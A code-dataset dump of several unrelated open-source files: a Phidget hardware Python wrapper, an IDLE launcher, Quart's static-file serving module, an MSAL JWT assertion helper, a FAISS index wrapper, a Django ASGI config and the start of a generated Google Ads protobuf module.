Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If there is no Phidget attached.
"""
deviceID = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceID(self.handle, byref(deviceID))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return deviceID.value
def getDeviceVersion(self):
"""Returns the device version of this Phidget.
This number is simply a way of distinguishing between different revisions of a specific type of Phidget, and is
only really of use if you need to troubleshoot device problems with Phidgets Inc.
Returns:
The Device Version <int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If there is no Phidget attached.
"""
version = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceVersion(self.handle, byref(version))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return version.value
def isAttached(self):
"""Returns the attached status of this Phidget.
This method returns True or False, depending on whether the Phidget is phisically plugged into the computer, initialized, and ready to use - or not.
If a Phidget is not attached, many functions calls will fail with a PhidgetException, so either checking this function, or using the Attach and Detach events, is recommended, if a device is likely to be attached or detached during use.
Returns:
Attached Status of the Phidget <boolean>
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
status = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceStatus(self.handle, byref(status))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if status.value == 1:
return True
else:
return False
def getLibraryVersion(self):
"""Returns the library version.
This is the library version of the underlying phidget21 C library and not the version of the Python wrapper module implementation.
The version is retured as a string which contains the version number and build date.
Returns:
The Library Version <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
libVer = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getLibraryVersion(byref(libVer))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(libVer)
def getSerialNum(self):
"""Returns the unique serial number of this Phidget.
This number is set during manufacturing, and is unique across all Phidgets. This number can be used in calls to open to specify this specific Phidget to be opened.
Returns:
The Serial Number <int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
serialNo = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getSerialNumber(self.handle, byref(serialNo))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return serialNo.value
def __nativeAttachEvent(self, handle, usrptr):
if self.__attach != None:
self.__attach(AttachEventArgs(self))
return 0
def setOnAttachHandler(self, attachHandler):
"""Sets the Attach Event Handler.
The attach handler is a method that will be called when this Phidget is physically attached to the system, and has gone through its initalization, and so is ready to be used.
Parameters:
attachHandler: hook to the attachHandler callback function
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
if attachHandler == None:
self.__attach = None
self.__onAttach = None
else:
self.__attach = attachHandler
self.__onAttach = self.__ATTACHHANDLER(self.__nativeAttachEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnAttach_Handler(self.handle, self.__onAttach, None)
except RuntimeError:
self.__attach = None
self.__onAttach = None
raise
if result > 0:
raise PhidgetException(result)
def __nativeDetachEvent(self, handle, usrptr):
if self.__detach != None:
self.__detach(DetachEventArgs(self))
return 0
def setOnDetachHandler(self, detachHandler):
"""Sets the Detach Event Handler.
The detach handler is a method that will be called when this Phidget is phisically detached from the system, and is no longer available.
This is particularly usefull for applications when a phisical detach would be expected.
Remember that many of the methods, if called on an unattached device, will throw a PhidgetException.
This Exception can be checked to see if it was caused by a device being unattached, but a better method would be to regiter the detach handler,
which could notify the main program logic that the device is no longer available, disable GUI controls, etc.
Parameters:
detachHandler: hook to the detachHandler callback function
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
if detachHandler == None:
self.__detach = None
self.__onDetach = None
else:
self.__detach = detachHandler
self.__onDetach = self.__DETACHHANDLER(self.__nativeDetachEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnDetach_Handler(self.handle, self.__onDetach, None)
except RuntimeError:
self.__detach = None
self.__onDetach = None
raise
if result > 0:
raise PhidgetException(result)
def __nativeErrorEvent(self, handle, usrptr, errorCode, errorMessage):
if self.__error != None:
code = errorCode
message = errorMessage
self.__error(ErrorEventArgs(self, message, code))
return 0
def setOnErrorhandler(self, errorHandler):
"""Sets the Error Event Handler.
The error handler is a method that will be called when an asynchronous error occurs.
Error events are not currently used, but will be in the future to report any problems that happen out of context from a direct function call.
Parameters:
errorHandler: hook to the errorHandler callback function.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
if errorHandler == None:
self.__error = None
self.__onError = None
else:
self.__error = errorHandler
self.__onError = self.__ERRORHANDLER(self.__nativeErrorEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnError_Handler(self.handle, self.__onError, None)
except RuntimeError:
self.__error = None
self.__onError = None
raise
if result > 0:
raise PhidgetException(result)
def waitForAttach(self, timeout):
"""Waits for this Phidget to become available.
This method can be called after open has been called to wait for thid Phidget to become available.
This is usefull because open is asynchronous (and thus returns immediately), and most methods will throw a PhidgetException is they are called before a device is actually ready.
This method is synonymous with polling the isAttached method until it returns True, or using the Attach event.
This method blocks for up to the timeout, at which point it will throw a PhidgetException. Otherwise, it returns when the phidget is attached and initialized.
A timeout of 0 is infinite.
Parameters:
timeout<long>: Timeout in milliseconds
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
try:
result = PhidgetLibrary.getDll().CPhidget_waitForAttachment(self.handle, c_long(timeout))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def __nativeServerConnectEvent(self, handle, usrptr):
if self.__serverConnect != None:
self.__serverConnect(ServerConnectArgs(self))
return 0
def setOnServerConnectHandler(self, serverConnectHandler):
"""Sets the Server Connect Event Handler.
The serverConnect handler is a method that will be called when a connection to a server is made. This is only usefull for Phidgets opened remotely.
Parameters:
serverConnectHandler: hook to the serverConnectHandler callback function
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened
"""
if serverConnectHandler == None:
self.__serverConnect = None
self.__onServerConnect = None
else:
self.__serverConnect = serverConnectHandler
self.__onServerConnect = self.__SERVERATTACHHANDLER(self.__nativeServerConnectEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnServerConnect_Handler(self.handle, self.__onServerConnect, None)
except RuntimeError:
self.__serverConnect = None
self.__onServerConnect = None
raise
if result > 0:
raise PhidgetException(result)
def __nativeServerDisconnectEvent(self, handle, usrptr):
if self.__serverDisconnect != None:
self.__serverDisconnect(ServerConnectArgs(self))
return 0
def setOnServerDisconnectHandler(self, serverDisconnectHandler):
"""Set the Server Disconnect event handler.
The serverDisconnect handler is a method that will be called when a connection to a server is terminated. This is only usefull for Phidgets opened remotely.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened
"""
if serverDisconnectHandler == None:
self.__serverDisconnect = None
self.__onServerDisconnect = None
else:
self.__serverDisconnect = serverDisconnectHandler
self.__onServerDisconnect = self.__SERVERDETACHHANDLER(self.__nativeServerDisconnectEvent)
try:
result = PhidgetLibrary.getDll().CPhidget_set_OnServerDisconnect_Handler(self.handle, self.__onServerDisconnect, None)
except RuntimeError:
self.__serverDisconnect = None
self.__onServerDisconnect = None
raise
if result > 0:
raise PhidgetException(result)
def getServerAddress(self):
"""Returns the Address of a Phidget Webservice.
Returns the Address of a Phidget Webservice when this Phidget was opened as remote.
This may be an IP Address or a hostname.
Returns:
The Address of the Webservice <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: if this Phidget was open opened as a remote Phidget.
"""
serverAddr = c_char_p()
port = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getServerAddress(self.handle, byref(serverAddr), byref(port))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(serverAddr)
def getServerID(self):
"""Returns the Server ID of a Phidget Webservice.
Returns the Server ID of a Phidget Webservice when this Phidget was opened as remote.
This is an arbitrary server identifier, independant of IP address and Port.
Returns:
The ServerID of the Webservice <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: if this Phidget was open opened as a remote Phidget.
"""
serverID = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getServerID(self.handle, byref(serverID))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(serverID)
def isAttachedToServer(self):
"""Returns the network attached status for remotely opened Phidgets.
This method returns True or False, depending on whether a connection to the Phidget WebService is open - or not.
If this is false for a remote Phidget then the connection is not active - either because a connection has not yet been established,
or because the connection was terminated.
Returns:
Phidget Network Attached Status <boolean>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened remotely.
"""
serverStatus = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getServerStatus(self.handle, byref(serverStatus))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if serverStatus.value == 1:
return True
else:
return False
@staticmethod
def enableLogging(level, file):
"""Turns on logging in the native C Library.
This is mostly usefull for debugging purposes - when an issue needs to be resolved by Phidgets Inc.
The output is mostly low-level library information, that won't be usefull for most users.
Logging may be usefull for users trying to debug their own problems, as logs can be inserted by the user using log.
The level can be one of:
PhidgetLogLevel.PHIDGET_LOG_VERBOSE (1),
PhidgetLogLevel.PHIDGET_LOG_INFO (2),
PhidgetLogLevel.PHIDGET_LOG_DEBUG (3),
PhidgetLogLevel.PHIDGET_LOG_WARNING (4),
PhidgetLogLevel.PHIDGET_LOG_ERROR (5)or
PhidgetLogLevel.PHIDGET_LOG_CRITICAL (6)
Parameters:
level<int>: highest level of logging that will be output, the PhidgetLogLevel object has been provided for a readable way to set this.
file<string>: path and name of file to output to. specify NULL to output to the console.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
try:
result = PhidgetLibrary.getDll().CPhidget_enableLogging(c_int(level), c_char_p(file))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
@staticmethod
def disableLogging():
"""Turns off logging in the native C Library.
This only needs to be called if enableLogging was called to turn logging on.
This will turn logging back off.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
try:
result = PhidgetLibrary.getDll().CPhidget_disableLogging()
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
@staticmethod
def log(level, id, log):
"""Adds a log entry into the phidget log.
This log is enabled by calling enableLogging and this allows the entry of user logs in amongst the phidget library logs.
The level can be one of:
PhidgetLogLevel.PHIDGET_LOG_VERBOSE,
PhidgetLogLevel.PHIDGET_LOG_INFO,
PhidgetLogLevel.PHIDGET_LOG_DEBUG,
PhidgetLogLevel.PHIDGET_LOG_WARNING,
PhidgetLogLevel.PHIDGET_LOG_ERROR or
PhidgetLogLevel.PHIDGET_LOG_CRITICAL
Note: PhidgetLogLevel.PHIDGET_LOG_DEBUG should not be used, as these logs are only printed when using the debug library,
which is not generally available.
Parameters:
level<int>: level to enter the log at.
id<string>: an arbitrary identifier for this log. This can be NULL. The C library uses this field for source filename and line number.
log<string>: the message to log.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
try:
result = PhidgetLibrary.getDll().CPhidget_log(c_int(level), c_char_p(id), c_char_p(log))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
| [
"tijmenvangurp@gmail.com"
] | tijmenvangurp@gmail.com |
279cb2ad93e730ca5ab7226c3892dc7e540539d1 | 19a3342618f008f1607617a7c816ba0072010ee6 | /truth_teller/easy_first/linux_python/bin/idle | 68a47b934072fb7f8067d9e574ede1c160476011 | [
"MIT"
] | permissive | gabrielStanovsky/unified-factuality | 9c72d89eff80d933f384ae3254b9a20e14bddee4 | 869fd23ec8fe71ab2b9f30389018615932d27cde | refs/heads/master | 2021-03-22T05:15:41.191073 | 2017-12-11T12:59:49 | 2017-12-11T12:59:49 | 88,627,892 | 8 | 2 | null | null | null | null | UTF-8 | Python | false | false | 99 | #!/usr/local/bin/python2.7
from idlelib.PyShell import main
if __name__ == '__main__':
main()
| [
"gabriel.satanovsky@gmail.com"
] | gabriel.satanovsky@gmail.com | |
9297cbb7a505e0c7a50a1da2c83a5bfeeba64abb | d1e90cae0562e9e14876309912f59b6855d91e64 | /app/lib/python3.7/site-packages/quart/static.py | 2a62574ce60fa687ae6f03a964ac5eb4502f4dba | [] | no_license | FoolForCS/sample-server | 518fb55c6b87ecb3f8be5e9a4184a6e90fd4932d | 9499c8820ae4043959894f077101c174f57890e6 | refs/heads/master | 2020-05-18T11:16:51.651490 | 2019-05-05T18:39:22 | 2019-05-05T18:39:22 | 184,372,008 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,795 | py | import mimetypes
import os
import pkgutil
import sys
from datetime import datetime, timedelta
from pathlib import Path
from typing import AnyStr, IO, Optional
from zlib import adler32
from jinja2 import FileSystemLoader
from .exceptions import NotFound
from .globals import current_app, request
from .typing import FilePath
from .utils import file_path_to_path
from .wrappers import Response
DEFAULT_MIMETYPE = 'application/octet-stream'
class PackageStatic:
def __init__(
self,
import_name: str,
template_folder: Optional[str]=None,
root_path: Optional[str]=None,
static_folder: Optional[str]=None,
static_url_path: Optional[str]=None,
) -> None:
self.import_name = import_name
self.template_folder = Path(template_folder) if template_folder is not None else None
self.root_path = self._find_root_path(root_path)
self._static_folder: Optional[Path] = None
self._static_url_path: Optional[str] = None
self.static_folder = static_folder
self.static_url_path = static_url_path
@property
def static_folder(self) -> Optional[Path]:
if self._static_folder is not None:
return self.root_path / self._static_folder
else:
return None
@static_folder.setter
def static_folder(self, static_folder: Optional[FilePath]) -> None:
if static_folder is not None:
self._static_folder = file_path_to_path(static_folder)
else:
self._static_folder = None
@property
def static_url_path(self) -> Optional[str]:
if self._static_url_path is not None:
return self._static_url_path
if self.static_folder is not None:
return '/' + self.static_folder.name
else:
return None
@static_url_path.setter
def static_url_path(self, static_url_path: str) -> None:
self._static_url_path = static_url_path
@property
def has_static_folder(self) -> bool:
return self.static_folder is not None
@property
def jinja_loader(self) -> Optional[FileSystemLoader]:
if self.template_folder is not None:
return FileSystemLoader(os.fspath(self.root_path / self.template_folder))
else:
return None
def get_send_file_max_age(self, filename: str) -> int:
return current_app.send_file_max_age_default.total_seconds()
async def send_static_file(self, filename: str) -> Response:
if not self.has_static_folder:
raise RuntimeError('No static folder for this object')
return await send_from_directory(self.static_folder, filename)
def open_resource(self, path: FilePath, mode: str='rb') -> IO[AnyStr]:
"""Open a file for reading.
Use as
.. code-block:: python
with app.open_resouce(path) as file_:
file_.read()
"""
if mode not in {'r', 'rb'}:
raise ValueError('Files can only be opened for reading')
return open(self.root_path / file_path_to_path(path), mode)
def _find_root_path(self, root_path: Optional[str]=None) -> Path:
if root_path is not None:
return Path(root_path)
else:
module = sys.modules.get(self.import_name)
if module is not None and hasattr(module, '__file__'):
file_path = module.__file__
else:
loader = pkgutil.get_loader(self.import_name)
if loader is None or self.import_name == '__main__':
return Path.cwd()
else:
file_path = loader.get_filename(self.import_name) # type: ignore
return Path(file_path).resolve().parent
def safe_join(directory: FilePath, *paths: FilePath) -> Path:
"""Safely join the paths to the known directory to return a full path.
Raises:
NotFound: if the full path does not share a commonprefix with
the directory.
"""
try:
safe_path = file_path_to_path(directory).resolve(strict=True)
full_path = file_path_to_path(directory, *paths).resolve(strict=True)
except FileNotFoundError:
raise NotFound()
try:
full_path.relative_to(safe_path)
except ValueError:
raise NotFound()
return full_path
async def send_from_directory(
directory: FilePath,
file_name: str,
*,
mimetype: Optional[str]=None,
as_attachment: bool=False,
attachment_filename: Optional[str]=None,
add_etags: bool=True,
cache_timeout: Optional[int]=None,
conditional: bool=True,
last_modified: Optional[datetime]=None,
) -> Response:
"""Send a file from a given directory.
Arguments:
directory: Directory that when combined with file_name gives
the file path.
file_name: File name that when combined with directory gives
the file path.
See :func:`send_file` for the other arguments.
"""
file_path = safe_join(directory, file_name)
if not file_path.is_file():
raise NotFound()
return await send_file(
file_path,
mimetype=mimetype,
as_attachment=as_attachment,
attachment_filename=attachment_filename,
add_etags=add_etags,
cache_timeout=cache_timeout,
conditional=conditional,
last_modified=last_modified,
)
async def send_file(
filename: FilePath,
mimetype: Optional[str]=None,
as_attachment: bool=False,
attachment_filename: Optional[str]=None,
add_etags: bool=True,
cache_timeout: Optional[int]=None,
conditional: bool=False,
last_modified: Optional[datetime]=None,
) -> Response:
"""Return a Reponse to send the filename given.
Arguments:
filename: The filename (path) to send, remember to use
:func:`safe_join`.
mimetype: Mimetype to use, by default it will be guessed or
revert to the DEFAULT_MIMETYPE.
as_attachment: If true use the attachment filename in a
Content-Disposition attachment header.
attachment_filename: Name for the filename, if it differs
add_etags: Set etags based on the filename, size and
modification time.
last_modified: Used to override the last modified value.
cache_timeout: Time in seconds for the response to be cached.
"""
file_path = file_path_to_path(filename)
if attachment_filename is None:
attachment_filename = file_path.name
if mimetype is None:
mimetype = mimetypes.guess_type(attachment_filename)[0] or DEFAULT_MIMETYPE
file_body = current_app.response_class.file_body_class(file_path)
response = current_app.response_class(file_body, mimetype=mimetype)
if as_attachment:
response.headers.add('Content-Disposition', 'attachment', filename=attachment_filename)
if last_modified is not None:
response.last_modified = last_modified
else:
response.last_modified = datetime.fromtimestamp(file_path.stat().st_mtime)
response.cache_control.public = True
cache_timeout = cache_timeout or current_app.get_send_file_max_age(file_path)
if cache_timeout is not None:
response.cache_control.max_age = cache_timeout
response.expires = datetime.utcnow() + timedelta(seconds=cache_timeout)
if add_etags:
response.set_etag(
'{}-{}-{}'.format(
file_path.stat().st_mtime, file_path.stat().st_size,
adler32(bytes(file_path)),
),
)
if conditional:
await response.make_conditional(request.range)
return response
| [
"siddhantsharan@MacBook-Pro-4.Dlink"
] | siddhantsharan@MacBook-Pro-4.Dlink |
6185c4ee4b791c20f5d13010e878886cc6615246 | 59063718a915ea1be886b927bc469efdf6b2786d | /samples/python/02.echo-bot/envs/chat_bot_02/Lib/site-packages/msal/oauth2cli/assertion.py | e84400df0bed3c62883ea5c08118322fa43c6fc8 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | luzeunice/BotBuilder-Samples | 665a397e79785b5fabfa0282ea2abb302182db48 | b62be4e8863125a567902b736b7b74313d9d4f28 | refs/heads/master | 2022-12-01T01:39:41.911152 | 2020-08-15T00:26:00 | 2020-08-15T00:26:00 | 287,571,525 | 0 | 0 | MIT | 2020-08-14T15:59:01 | 2020-08-14T15:59:00 | null | UTF-8 | Python | false | false | 4,660 | py | import time
import binascii
import base64
import uuid
import logging
import jwt
logger = logging.getLogger(__name__)
class AssertionCreator(object):
def create_normal_assertion(
self, audience, issuer, subject, expires_at=None, expires_in=600,
issued_at=None, assertion_id=None, **kwargs):
"""Create an assertion in bytes, based on the provided claims.
All parameter names are defined in https://tools.ietf.org/html/rfc7521#section-5
except the expires_in is defined here as lifetime-in-seconds,
which will be automatically translated into expires_at in UTC.
"""
raise NotImplementedError("Will be implemented by sub-class")
def create_regenerative_assertion(
self, audience, issuer, subject=None, expires_in=600, **kwargs):
"""Create an assertion as a callable,
which will then compute the assertion later when necessary.
This is a useful optimization to reuse the client assertion.
"""
return AutoRefresher( # Returns a callable
lambda a=audience, i=issuer, s=subject, e=expires_in, kwargs=kwargs:
self.create_normal_assertion(a, i, s, expires_in=e, **kwargs),
expires_in=max(expires_in-60, 0))
class AutoRefresher(object):
"""Cache the output of a factory, and auto-refresh it when necessary. Usage::
r = AutoRefresher(time.time, expires_in=5)
for i in range(15):
print(r()) # the timestamp change only after every 5 seconds
time.sleep(1)
"""
def __init__(self, factory, expires_in=540):
self._factory = factory
self._expires_in = expires_in
self._buf = {}
def __call__(self):
EXPIRES_AT, VALUE = "expires_at", "value"
now = time.time()
if self._buf.get(EXPIRES_AT, 0) <= now:
logger.debug("Regenerating new assertion")
self._buf = {VALUE: self._factory(), EXPIRES_AT: now + self._expires_in}
else:
logger.debug("Reusing still valid assertion")
return self._buf.get(VALUE)
class JwtAssertionCreator(AssertionCreator):
def __init__(self, key, algorithm, sha1_thumbprint=None, headers=None):
"""Construct a Jwt assertion creator.
Args:
key (str): The key for signing, e.g. a base64 encoded private key.
algorithm (str):
"RS256", etc.. See https://pyjwt.readthedocs.io/en/latest/algorithms.html
RSA and ECDSA algorithms require "pip install cryptography".
sha1_thumbprint (str): The x5t aka X.509 certificate SHA-1 thumbprint.
headers (dict): Additional headers, e.g. "kid" or "x5c" etc.
"""
self.key = key
self.algorithm = algorithm
self.headers = headers or {}
if sha1_thumbprint: # https://tools.ietf.org/html/rfc7515#section-4.1.7
self.headers["x5t"] = base64.urlsafe_b64encode(
binascii.a2b_hex(sha1_thumbprint)).decode()
def create_normal_assertion(
self, audience, issuer, subject=None, expires_at=None, expires_in=600,
issued_at=None, assertion_id=None, not_before=None,
additional_claims=None, **kwargs):
"""Create a JWT Assertion.
Parameters are defined in https://tools.ietf.org/html/rfc7523#section-3
Key-value pairs in additional_claims will be added into payload as-is.
"""
now = time.time()
payload = {
'aud': audience,
'iss': issuer,
'sub': subject or issuer,
'exp': expires_at or (now + expires_in),
'iat': issued_at or now,
'jti': assertion_id or str(uuid.uuid4()),
}
if not_before:
payload['nbf'] = not_before
payload.update(additional_claims or {})
try:
return jwt.encode(
payload, self.key, algorithm=self.algorithm, headers=self.headers)
except:
if self.algorithm.startswith("RS") or self.algorithm.starswith("ES"):
logger.exception(
'Some algorithms requires "pip install cryptography". '
'See https://pyjwt.readthedocs.io/en/latest/installation.html#cryptographic-dependencies-optional')
raise
# Obsolete. For backward compatibility. They will be removed in future versions.
Signer = AssertionCreator # For backward compatibility
JwtSigner = JwtAssertionCreator # For backward compatibility
JwtSigner.sign_assertion = JwtAssertionCreator.create_normal_assertion # For backward compatibility
| [
"53527436+LuzEuniceTec@users.noreply.github.com"
] | 53527436+LuzEuniceTec@users.noreply.github.com |
78bd3bce57cbbfad6500ce8bde3647b2e9309e76 | b4112069bf02c51a70171470b783b54edb7adbc8 | /cli/app/indexes/faiss_index.py | 071cc799218237956811f846b94ac9664e8703de | [] | no_license | breezykermo/vframe_search | 41325850a56318ff26c646b426a4bae143491294 | 7dc2c9c97e1ef69ae42c6c1c60d957968dc2f491 | refs/heads/master | 2020-08-09T02:26:42.131057 | 2019-10-14T11:55:08 | 2019-10-14T11:55:08 | 213,977,612 | 1 | 0 | null | 2019-10-14T11:55:09 | 2019-10-09T17:11:11 | null | UTF-8 | Python | false | false | 1,878 | py | """FAISS index can use PCA to reduce file size but runs in-memory"""
import os
import numpy as np
import faiss
from app.settings import app_cfg
class FAISSIndex:
def __init__(self, feature):
self.feature = feature
self.model_cfg = app_cfg.MODELZOO_CFG.get(feature.modelzoo_name)
self.recipe = self.feature.get_recipe('faiss')
if 'factory_type' not in self.recipe:
print("No factory_type specified!")
self.factory_type = self.recipe['factory_type']
self.path = os.path.join(app_cfg.DIR_INDEXES, self.feature.index_type, self.feature.modelzoo_name)
self.fn = path.join(self.path, "faiss-{}.index".format(self.factory_type.replace(',', '_')))
self.can_append = True
os.makedirs(self.path, exist_ok=True)
def load(self):
if os.path.exists(self.fn):
self.index = faiss.read_index(self.fn)
else:
return self.create()
def create(self):
self.index = faiss.index_factory(model_cfg.get('dimension'), self.factory_type)
def train(self, vecs):
'''Optional FAISS-only pretraining step'''
vecs = np.array(vecs)
index.train(vecs)
def add(self, vecs):
vecs = np.array(vecs)
self.index.add(vecs)
def add_one(self, vec):
self.index.add([vec])
def save(self):
faiss.write_index(self.index, self.fn)
def query(self, query, offset=0, limit=30):
end = offset + limit
distances, indexes = self.index.search(query, end)
if len(indexes) == 0:
print("weird, no results!")
return []
distances = distances[0]
indexes = indexes[0]
if offset > 0:
distances = distances[offset:offset+limit]
indexes = indexes[offset:offset+limit]
if len(indexes) == 0:
print("no results!")
return []
return distances, indexes
# add_start = time.time()
# index.add(feats)
# add_end = time.time()
# add_time = add_end - add_start
| [
"julescarbon@gmail.com"
] | julescarbon@gmail.com |
142144690c9bc570f2e861f2640f4b323329a7cc | b8f5cd64c19a16718f54f7cc1af047f5a1573dba | /policy/policy/asgi.py | f3d60ef03da070af178a0d538d72ca1426676a8b | [] | no_license | nimesh03/stockguard_quote | 1df5e2fad866e3ea57f7b105c3e3522a47854791 | e9a13c240b33a2a82e4d0186ce667039f18d290d | refs/heads/main | 2023-01-07T14:58:44.511109 | 2020-11-02T16:02:18 | 2020-11-02T16:02:18 | 309,235,971 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | """
ASGI config for policy project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'policy.settings')
application = get_asgi_application()
| [
"nimesh19@hotmail.ca"
] | nimesh19@hotmail.ca |
0ea336d1bed70a132a1e8766836314253ea5c079 | 4433b1b3157275caa9ef667939ad7b24217df316 | /week1/thefirst_week/week4/unique_people.py | b574adbbef94b7f9cac0b19b4782aa811e460a86 | [] | no_license | Gabrielganchev/Programming0 | b8bf65014d01cc2d6e609332ff9beb527958b0bc | 249e14ba4194bab4be9938784d9c6f181985e1eb | refs/heads/master | 2016-08-07T15:34:19.874951 | 2015-05-14T17:26:05 | 2015-05-14T17:26:05 | 35,138,865 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | def get_people_count(activity):
counted_people = []
for person in activity:
if person not in counted_people:
counted_people += [person]
return len(counted_people)
print(get_people_count(["Rado", "Ivo", "Maria", "Anneta", "Rado", "Rado", "Anneta", "Ivo", "Maria", "Rado"]))
| [
"gabriel_ganchev@abv.bg"
] | gabriel_ganchev@abv.bg |
7493629d6e1853839179716db93c9a7fcec7dbf8 | 42c48f3178a48b4a2a0aded547770027bf976350 | /google/ads/google_ads/v5/proto/resources/customer_negative_criterion_pb2.py | a77e1ccec1e3bee71b3e49346e6e67070a3c1c2b | [
"Apache-2.0"
] | permissive | fiboknacky/google-ads-python | e989464a85f28baca1f28d133994c73759e8b4d6 | a5b6cede64f4d9912ae6ad26927a54e40448c9fe | refs/heads/master | 2021-08-07T20:18:48.618563 | 2020-12-11T09:21:29 | 2020-12-11T09:21:29 | 229,712,514 | 0 | 0 | Apache-2.0 | 2019-12-23T08:44:49 | 2019-12-23T08:44:49 | null | UTF-8 | Python | false | true | 14,503 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v5/proto/resources/customer_negative_criterion.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v5.proto.common import criteria_pb2 as google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2
from google.ads.google_ads.v5.proto.enums import criterion_type_pb2 as google_dot_ads_dot_googleads__v5_dot_proto_dot_enums_dot_criterion__type__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v5/proto/resources/customer_negative_criterion.proto',
package='google.ads.googleads.v5.resources',
syntax='proto3',
serialized_options=b'\n%com.google.ads.googleads.v5.resourcesB\036CustomerNegativeCriterionProtoP\001ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v5/resources;resources\242\002\003GAA\252\002!Google.Ads.GoogleAds.V5.Resources\312\002!Google\\Ads\\GoogleAds\\V5\\Resources\352\002%Google::Ads::GoogleAds::V5::Resources',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\nIgoogle/ads/googleads_v5/proto/resources/customer_negative_criterion.proto\x12!google.ads.googleads.v5.resources\x1a\x33google/ads/googleads_v5/proto/common/criteria.proto\x1a\x38google/ads/googleads_v5/proto/enums/criterion_type.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a\x1cgoogle/api/annotations.proto\"\xe5\x06\n\x19\x43ustomerNegativeCriterion\x12Q\n\rresource_name\x18\x01 \x01(\tB:\xe0\x41\x05\xfa\x41\x34\n2googleads.googleapis.com/CustomerNegativeCriterion\x12\x14\n\x02id\x18\n \x01(\x03\x42\x03\xe0\x41\x03H\x01\x88\x01\x01\x12Q\n\x04type\x18\x03 \x01(\x0e\x32>.google.ads.googleads.v5.enums.CriterionTypeEnum.CriterionTypeB\x03\xe0\x41\x03\x12N\n\rcontent_label\x18\x04 \x01(\x0b\x32\x30.google.ads.googleads.v5.common.ContentLabelInfoB\x03\xe0\x41\x05H\x00\x12X\n\x12mobile_application\x18\x05 \x01(\x0b\x32\x35.google.ads.googleads.v5.common.MobileApplicationInfoB\x03\xe0\x41\x05H\x00\x12Y\n\x13mobile_app_category\x18\x06 \x01(\x0b\x32\x35.google.ads.googleads.v5.common.MobileAppCategoryInfoB\x03\xe0\x41\x05H\x00\x12G\n\tplacement\x18\x07 \x01(\x0b\x32-.google.ads.googleads.v5.common.PlacementInfoB\x03\xe0\x41\x05H\x00\x12N\n\ryoutube_video\x18\x08 